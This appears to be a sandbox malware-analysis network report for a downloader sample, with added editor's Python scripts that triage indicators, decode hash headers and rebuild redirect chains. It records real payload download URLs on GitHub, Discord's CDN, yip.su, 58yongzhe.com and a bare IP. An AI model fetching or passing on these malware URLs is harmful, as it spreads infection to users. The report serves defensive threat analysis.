Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
yip.su | 172.67.169.89 | |
cacerts.digicert.com | CNAME fp2e7a.wpc.phicdn.net | 152.195.38.76 |
pastebin.com | 104.20.4.235 | |
raw.githubusercontent.com | 185.199.111.133 | |
58yongzhe.com | 178.22.31.113 | |
github.com | 20.200.245.247 | |
cdn.discordapp.com | 162.159.134.233 | |
- TCP Requests (source -> destination, resolved hostname)
  - 192.168.56.103:49165 -> 104.20.3.235:443 (pastebin.com)
  - 192.168.56.103:49172 -> 152.195.38.76:80 (cacerts.digicert.com)
  - 192.168.56.103:49170 -> 162.159.133.233:443 (cdn.discordapp.com)
  - 192.168.56.103:49168 -> 172.67.169.89:443 (yip.su)
  - 192.168.56.103:49169 -> 178.22.31.113:80 (58yongzhe.com)
  - 192.168.56.103:49171 -> 185.199.111.133:443 (raw.githubusercontent.com)
  - 192.168.56.103:49166 -> 194.58.114.223:80 (no hostname; contacted by IP)
  - 192.168.56.103:49167 -> 20.200.245.247:443 (github.com)
- UDP Requests (source -> destination)
  - 192.168.56.103:50800 -> 164.124.101.2:53 (DNS)
  - 192.168.56.103:52760 -> 164.124.101.2:53 (DNS)
  - 192.168.56.103:53673 -> 164.124.101.2:53 (DNS)
  - 192.168.56.103:56613 -> 164.124.101.2:53 (DNS)
  - 192.168.56.103:62576 -> 164.124.101.2:53 (DNS)
  - 192.168.56.103:64178 -> 164.124.101.2:53 (DNS)
  - 192.168.56.103:64894 -> 164.124.101.2:53 (DNS)
  - 192.168.56.103:137 -> 192.168.56.255:137 (NetBIOS name service, subnet broadcast)
  - 192.168.56.103:138 -> 192.168.56.255:138 (NetBIOS datagram service, subnet broadcast)
  - 192.168.56.103:49154 -> 239.255.255.250:1900 (SSDP multicast)
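The connection lists above mix the sample's own traffic with background noise the analysis VM generates by itself. The following script, added here as an editor's example and not part of the original report, parses the TCP/UDP lines copied from this page, drops the resolver, broadcast and multicast traffic, and buckets the remaining destinations. The noise rules, the assumed /24 sandbox subnet, the treatment of cacerts.digicert.com as a Windows CryptoAPI fetch, and the split between attacker-controlled hosts and abused public services are the editor's assumptions.

```python
"""Triage the sandbox connection list into IOCs and background noise.

Added example, not part of the original report. CONNECTIONS is copied from
the TCP and UDP request lists above; the noise rules and the attacker-host
versus abused-service split are the editor's assumptions.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import Optional

# Constructed from the report's TCP/UDP request lists (proto src dst [host]).
CONNECTIONS = """\
TCP 192.168.56.103:49165 104.20.3.235:443 pastebin.com
TCP 192.168.56.103:49172 152.195.38.76:80 cacerts.digicert.com
TCP 192.168.56.103:49170 162.159.133.233:443 cdn.discordapp.com
TCP 192.168.56.103:49168 172.67.169.89:443 yip.su
TCP 192.168.56.103:49169 178.22.31.113:80 58yongzhe.com
TCP 192.168.56.103:49171 185.199.111.133:443 raw.githubusercontent.com
TCP 192.168.56.103:49166 194.58.114.223:80
TCP 192.168.56.103:49167 20.200.245.247:443 github.com
UDP 192.168.56.103:50800 164.124.101.2:53
UDP 192.168.56.103:137 192.168.56.255:137
UDP 192.168.56.103:138 192.168.56.255:138
UDP 192.168.56.103:49154 239.255.255.250:1900
"""

LINE_RE = re.compile(
    r"^(?P<proto>TCP|UDP)\s+(?P<src>[\d.]+):(?P<sport>\d+)\s+"
    r"(?P<dst>[\d.]+):(?P<dport>\d+)(?:\s+(?P<host>\S+))?$"
)

# Assumption: the analysis VM (192.168.56.103) sits in a /24.
SANDBOX_NET = ipaddress.ip_network("192.168.56.0/24")
# Assumption: fetched by Windows CryptoAPI during chain building, not by the sample.
OS_BACKGROUND = {"cacerts.digicert.com"}
# Assumption: legitimate services abused for hosting; pivot on full URLs, not domains.
ABUSED_SERVICES = {"pastebin.com", "github.com", "raw.githubusercontent.com",
                   "cdn.discordapp.com"}


@dataclass(frozen=True)
class Conn:
    proto: str
    dst: str
    dport: int
    host: Optional[str]

    def is_noise(self) -> bool:
        dst = ipaddress.ip_address(self.dst)
        if self.proto == "UDP" and self.dport == 53:
            return True  # resolver traffic; the queried names are in the DNS table
        if dst.is_multicast or dst == SANDBOX_NET.broadcast_address:
            return True  # SSDP discovery and NetBIOS broadcasts
        return self.host in OS_BACKGROUND


def parse(text: str) -> list:
    """Parse 'proto src:port dst:port [host]' lines into Conn records."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            raise ValueError(f"unparsed line: {line!r}")
        conns.append(Conn(m["proto"], m["dst"], int(m["dport"]), m["host"]))
    return conns


def triage(text: str) -> dict:
    """Bucket the non-noise destinations, preserving first-seen order."""
    out = {"attacker_hosts": [], "abused_services": [], "direct_ip": []}
    for c in parse(text):
        if c.is_noise():
            continue
        if c.host is None:
            bucket, key = "direct_ip", c.dst  # no hostname: hard-coded staging IP
        elif c.host in ABUSED_SERVICES:
            bucket, key = "abused_services", c.host
        else:
            bucket, key = "attacker_hosts", c.host
        if key not in out[bucket]:
            out[bucket].append(key)
    return out


if __name__ == "__main__":
    for bucket, items in triage(CONNECTIONS).items():
        print(f"{bucket}: {', '.join(items) or '-'}")
```

Run against the lines above, the script leaves two attacker-controlled domains (yip.su, 58yongzhe.com), one bare IP (194.58.114.223) and four public services whose domains are useless as block-list entries; for those the full URLs in the HTTP section are the indicators.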
GET 200 https://pastebin.com/raw/xYhKBupz
Request:
GET /raw/xYhKBupz HTTP/1.1
Host: pastebin.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2024 01:00:40 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 1;mode=block
cache-control: public, max-age=1801
CF-Cache-Status: EXPIRED
Last-Modified: Mon, 12 Aug 2024 01:00:40 GMT
Server: cloudflare
CF-RAY: 8b1c87a01b4729df-FUK
GET 302 https://github.com/evan9908/Setup/raw/main/222fastsetup.exe
Request:
GET /evan9908/Setup/raw/main/222fastsetup.exe HTTP/1.1
Host: github.com
Connection: Keep-Alive
Response:
HTTP/1.1 302 Found
Server: GitHub.com
Date: Mon, 12 Aug 2024 01:00:41 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Access-Control-Allow-Origin:
Location: https://raw.githubusercontent.com/evan9908/Setup/main/222fastsetup.exe
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/github-completion/completions proxy.enterprise.githubcopilot.com/v1/engines/github-completion/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
Content-Length: 0
X-GitHub-Request-Id: C00F:0A4D:D45B4E:FA3635:66B95EB8
GET 200 https://cdn.discordapp.com/attachments/992447897431978184/1272110855789609012/setup.exe?ex=66b9c90e&is=66b8778e&hm=e8455d1fc18777dd82c36c2f38f2ff7183f2d98ce3885f05b556912b31748099&
Request:
GET /attachments/992447897431978184/1272110855789609012/setup.exe?ex=66b9c90e&is=66b8778e&hm=e8455d1fc18777dd82c36c2f38f2ff7183f2d98ce3885f05b556912b31748099& HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2024 01:00:41 GMT
Content-Type: application/x-msdos-program
Content-Length: 7591656
Connection: keep-alive
CF-Ray: 8b1c87a54da330cd-ICN
CF-Cache-Status: HIT
Accept-Ranges: bytes, bytes
Age: 59099
Cache-Control: public, max-age=31536000
Content-Disposition: attachment; filename="setup.exe"
ETag: "5dc97eacc5086f917367b3e29d0e459e"
Expires: Tue, 12 Aug 2025 01:00:41 GMT
Last-Modified: Sun, 11 Aug 2024 08:34:22 GMT
Vary: Accept-Encoding
alt-svc: h3=":443"; ma=86400
x-goog-generation: 1723365262757529
x-goog-hash: crc32c=QVPp8A==
x-goog-hash: md5=Xcl+rMUIb5FzZ7PinQ5Fng==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 7591656
x-guploader-uploadid: AHxI1nNaBgK_hGS9kZsercx1M4PqBi5muK8JQkKNUzVjQgCyor_s0gfDWtbplNwlSqmOMW9gS_Q
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Set-Cookie: __cf_bm=qhhid41gWvLfHvc49KKztvYQjLFXtg4CXhghYFWRCCo-1723424441-1.0.1.1-xxcPrPNhGe9WxzyBIDQ9ik.zuh5H7UlXPkyXVuXdCg5QMvhKWGl.9VOwvVO0kaBHQ1dHUmKC.hHJxilN7oCrCg; path=/; expires=Mon, 12-Aug-24 01:30:41 GMT; domain=.discordapp.com; HttpOnly; Secure
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rlk552ktKUuZk3J7%2BkoMrI0vTdl9YIwR%2Bcpfn18A4m5v4RSXq4wHtPxR37vrePyBmCSD83MQ5L8yOGUdzAGkoBoSfnLNuAMFDM1OYEpSIn3n5CJC7rVGVPzwc0Ek0naKfHMUcw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: _cfuvid=hPlq.9Y.KbNNbJR6Jq1yxhQJH3jJEAJDd2zjLRj8X38-1723424441193-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
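The x-goog-* headers in the response above show that the Discord attachment is served from a Google Cloud Storage object, and x-goog-hash carries the object's MD5 and CRC-32C as base64. Those are ready-made file indicators for the 7,591,656-byte setup.exe, provided they are decoded correctly: the MD5 is the raw 16-byte digest, and the CRC-32C is the 32-bit value in big-endian byte order. The following script, added here as an editor's example and not part of the original report, decodes the headers copied from this page, cross-checks the MD5 against the ETag, and verifies a retrieved sample against both hashes. The payload itself is not on this page, so the positive verification case runs on constructed bytes.

```python
"""Turn x-goog-hash headers into pivotable hashes and verify a sample.

Added example, not part of the original report. HEADERS is an excerpt of
the cdn.discordapp.com response on this page; the sample bytes used for
the positive check are constructed, as the real payload is not available.
"""
import base64
import hashlib

# Excerpt copied from the report's cdn.discordapp.com response.
HEADERS = """\
Content-Length: 7591656
ETag: "5dc97eacc5086f917367b3e29d0e459e"
x-goog-hash: crc32c=QVPp8A==
x-goog-hash: md5=Xcl+rMUIb5FzZ7PinQ5Fng==
x-goog-stored-content-length: 7591656
"""


def _header_values(raw: str, name: str) -> list:
    """All values of a (case-insensitive) header in a raw header block."""
    values = []
    for line in raw.splitlines():
        key, sep, value = line.partition(":")
        if sep and key.strip().lower() == name.lower():
            values.append(value.strip())
    return values


def parse_goog_hash(raw: str) -> dict:
    """Return {'md5': hex, 'crc32c': hex}; GCS base64-encodes both values."""
    out = {}
    for value in _header_values(raw, "x-goog-hash"):
        alg, _, b64 = value.partition("=")  # split at the first '=' only
        out[alg] = base64.b64decode(b64).hex()
    return out


def etag_hash(raw: str):
    """The ETag, unquoted; for a non-composite GCS object it is the MD5 hex."""
    values = _header_values(raw, "etag")
    return values[0].strip('"') if values else None


# CRC-32C (Castagnoli), reflected, polynomial 0x82F63B78: the variant GCS uses.
_TABLE = []
for _n in range(256):
    _c = _n
    for _ in range(8):
        _c = (_c >> 1) ^ 0x82F63B78 if _c & 1 else _c >> 1
    _TABLE.append(_c)


def crc32c(data: bytes) -> int:
    crc = 0xFFFFFFFF
    for b in data:
        crc = _TABLE[(crc ^ b) & 0xFF] ^ (crc >> 8)
    return crc ^ 0xFFFFFFFF


def headers_for(sample: bytes) -> str:
    """Build the x-goog-hash lines GCS would emit for sample (for self-checks)."""
    crc = base64.b64encode(crc32c(sample).to_bytes(4, "big")).decode()
    md5 = base64.b64encode(hashlib.md5(sample).digest()).decode()
    return f"x-goog-hash: crc32c={crc}\nx-goog-hash: md5={md5}\n"


def verify(sample: bytes, raw_headers: str) -> dict:
    """Per-algorithm match of a retrieved sample against the advertised hashes."""
    want = parse_goog_hash(raw_headers)
    got = {"md5": hashlib.md5(sample).hexdigest(),
           "crc32c": f"{crc32c(sample):08x}"}
    return {alg: got[alg] == want[alg] for alg in want}


if __name__ == "__main__":
    print(parse_goog_hash(HEADERS), "etag:", etag_hash(HEADERS))
```

Decoding the page's headers gives MD5 5dc97eacc5086f917367b3e29d0e459e, identical to the ETag, and CRC-32C 4153e9f0. Either value identifies the served object regardless of the expiring `ex`/`is`/`hm` parameters in the URL, which is why the hash, not the URL, belongs in the indicator set.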
GET 403 https://yip.su/RNWPd.exe
Request:
GET /RNWPd.exe HTTP/1.1
Host: yip.su
Connection: Keep-Alive
Response:
HTTP/1.1 403 Forbidden
Date: Mon, 12 Aug 2024 01:00:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
Referrer-Policy: same-origin
X-Content-Options: nosniff
X-Frame-Options: SAMEORIGIN
cf-mitigated: challenge
cf-chl-out: 976HLdL4JcUo/Xdj93NgXo693RZZrv1n/+pj/yjvZlosi8Y9tsAX6c+NzDQv2BcZEJFWlV9TYZwENdvjcDeUBQGe5HjJ9g949NjwcEyC6sw=$Hajvo4FqWkUhnC5UbxWFzQ==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BRP45t11kHkSqXDNr7B3WznNyLJm%2BanZDd9%2Bl2TvDu9e6VPY%2F8SGSfWB0y8a%2Fw%2BvHlfiHvEPehgBhZhb7F0tCTxWTLirfZrxkuda8DysFJoathLphcSjAnM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b1c87a84f822eed-LAX
alt-svc: h3=":443"; ma=86400
GET 302 http://194.58.114.223/d/385121
Request:
GET /d/385121 HTTP/1.1
Host: 194.58.114.223
Connection: Keep-Alive
Response:
HTTP/1.1 302 Found
Server: nginx
Date: Mon, 12 Aug 2024 01:00:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=120
Location: https://cdn.discordapp.com/attachments/992447897431978184/1272110855789609012/setup.exe?ex=66b9c90e&is=66b8778e&hm=e8455d1fc18777dd82c36c2f38f2ff7183f2d98ce3885f05b556912b31748099&
GET 200 http://58yongzhe.com/parts/setup1.exe
Request:
GET /parts/setup1.exe HTTP/1.1
Host: 58yongzhe.com
Connection: Keep-Alive
Response:
HTTP/1.1 200 OK
Date: Mon, 12 Aug 2024 01:00:41 GMT
Server: nginx/1.26.1
Content-Type: application/x-dosexec
Content-Length: 419328
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET 200 http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
Request:
GET /DigiCertGlobalRootG2.crt HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: cacerts.digicert.com
Response:
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 8563
cache-control: max-age=172800, public
Content-Type: application/pkix-cert
Date: Mon, 12 Aug 2024 01:00:41 GMT
Etag: "5a286417-392"
expires: Wed, 14 Aug 2024 01:00:41 GMT
last-modified: Wed, 06 Dec 2017 21:41:43 GMT
Server: ECAcc (tkc/BECE)
X-Cache: HIT
Content-Length: 914
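The HTTP section records two redirects (github.com to raw.githubusercontent.com, and the bare IP 194.58.114.223 to the Discord CDN) alongside the direct downloads, and a 403 from yip.su whose cf-mitigated: challenge header marks a Cloudflare challenge rather than a served file. The following script, added here as an editor's example and not part of the original report, rebuilds the delivery chains by walking the Location headers recorded in the capture and lists the executables actually served. TRANSACTIONS is a hand-copied subset of the URLs, status codes, Location headers and response metadata above; the chain logic and the set of MIME types treated as executable are the editor's, and a redirect whose target was not captured (raw.githubusercontent.com here) is reported as an unobserved hop rather than guessed.

```python
"""Rebuild payload delivery chains from the captured HTTP transactions.

Added example, not part of the original report. TRANSACTIONS is copied
from the HTTP section of this page; the chain-walking logic and the
executable MIME set are the editor's assumptions.
"""
from urllib.parse import urlsplit

DISCORD_URL = ("https://cdn.discordapp.com/attachments/992447897431978184/"
               "1272110855789609012/setup.exe?ex=66b9c90e&is=66b8778e"
               "&hm=e8455d1fc18777dd82c36c2f38f2ff7183f2d98ce3885f05b556912b31748099&")

# Constructed from the report's HTTP section, one entry per transaction.
TRANSACTIONS = [
    {"url": "https://pastebin.com/raw/xYhKBupz", "status": 200,
     "type": "text/plain; charset=utf-8"},
    {"url": "https://github.com/evan9908/Setup/raw/main/222fastsetup.exe", "status": 302,
     "location": "https://raw.githubusercontent.com/evan9908/Setup/main/222fastsetup.exe"},
    {"url": DISCORD_URL, "status": 200,
     "type": "application/x-msdos-program", "length": 7591656},
    {"url": "https://yip.su/RNWPd.exe", "status": 403,
     "type": "text/html; charset=UTF-8", "cf-mitigated": "challenge"},
    {"url": "http://194.58.114.223/d/385121", "status": 302, "location": DISCORD_URL},
    {"url": "http://58yongzhe.com/parts/setup1.exe", "status": 200,
     "type": "application/x-dosexec", "length": 419328},
    {"url": "http://cacerts.digicert.com/DigiCertGlobalRootG2.crt", "status": 200,
     "type": "application/pkix-cert", "length": 914},
]

REDIRECTS = {301, 302, 303, 307, 308}
# Assumption: MIME types under which Windows executables are commonly served.
EXECUTABLE_TYPES = {"application/x-msdos-program", "application/x-dosexec",
                    "application/octet-stream"}


def follow(start_url: str, txns: list, limit: int = 10) -> dict:
    """Walk recorded Location headers from start_url.

    Returns the hops visited and how the chain ended: 'served' (a captured
    non-redirect response), 'unobserved' (redirect target not in the
    capture) or 'loop' (hop limit reached)."""
    by_url = {t["url"]: t for t in txns}
    hops, url = [], start_url
    while url is not None:
        if len(hops) >= limit:
            return {"hops": hops, "end": "loop"}
        hops.append(url)
        t = by_url.get(url)
        if t is None:
            return {"hops": hops, "end": "unobserved"}
        if t["status"] not in REDIRECTS:
            return {"hops": hops, "end": "served"}
        url = t.get("location")
    return {"hops": hops, "end": "unobserved"}  # redirect without Location


def delivery_chains(txns: list) -> list:
    """One chain per request that is not itself the target of a recorded redirect."""
    targets = {t["location"] for t in txns if "location" in t}
    return [follow(t["url"], txns) for t in txns if t["url"] not in targets]


def payloads(txns: list) -> list:
    """(host, size) of executables actually served with a 200."""
    return [(urlsplit(t["url"]).netloc, t["length"]) for t in txns
            if t["status"] == 200 and t.get("type") in EXECUTABLE_TYPES]


def challenged(txns: list) -> list:
    """Requests answered with a Cloudflare challenge instead of content."""
    return [t["url"] for t in txns if t.get("cf-mitigated") == "challenge"]


if __name__ == "__main__":
    for chain in delivery_chains(TRANSACTIONS):
        print(chain["end"], " -> ".join(chain["hops"]))
    print("payloads:", payloads(TRANSACTIONS))
    print("challenged:", challenged(TRANSACTIONS))
```

On the page's transactions this yields six chains: the github.com request ends in an unobserved hop at raw.githubusercontent.com (the TLS table shows that connection, but its HTTP exchange is not in the capture), the 194.58.114.223 request lands on the Discord-hosted setup.exe, and only two executables were actually delivered, the 7,591,656-byte setup.exe from cdn.discordapp.com and the 419,328-byte setup1.exe from 58yongzhe.com. The yip.su download never happened in the sandbox because Cloudflare interposed a challenge, so that file remains an unknown.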
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.103:49168 -> 172.67.169.89:443 | C=US, O=Google Trust Services, CN=WE1 | CN=yip.su | 54:c6:bc:0e:e6:b0:fd:78:5e:b0:5a:18:c6:42:6a:44:fc:cc:b3:ca |
TLS 1.2 192.168.56.103:49170 -> 162.159.133.233:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=discordapp.com | 97:8b:ee:ad:1e:bf:a1:69:e7:94:29:f7:55:7a:29:64:19:c7:81:39 |
TLS 1.2 192.168.56.103:49165 -> 104.20.3.235:443 | C=US, O=Google Trust Services, CN=WE1 | CN=pastebin.com | 82:49:c5:04:9a:bd:a9:c1:ab:4d:ff:95:b9:94:74:cc:40:bc:09:7f |
TLS 1.2 192.168.56.103:49167 -> 20.200.245.247:443 | C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo ECC Domain Validation Secure Server CA | CN=github.com | e7:03:5b:cc:1c:18:77:1f:79:2f:90:86:6b:6c:1d:f8:df:aa:bd:c0 |
TLS 1.2 192.168.56.103:49171 -> 185.199.111.133:443 | C=US, O=DigiCert Inc, CN=DigiCert Global G2 TLS RSA SHA256 2020 CA1 | C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io | 97:d8:c5:70:0f:12:24:6c:88:bc:fa:06:7e:8c:a7:4d:a8:62:67:28 |
Snort Alerts
No Snort Alerts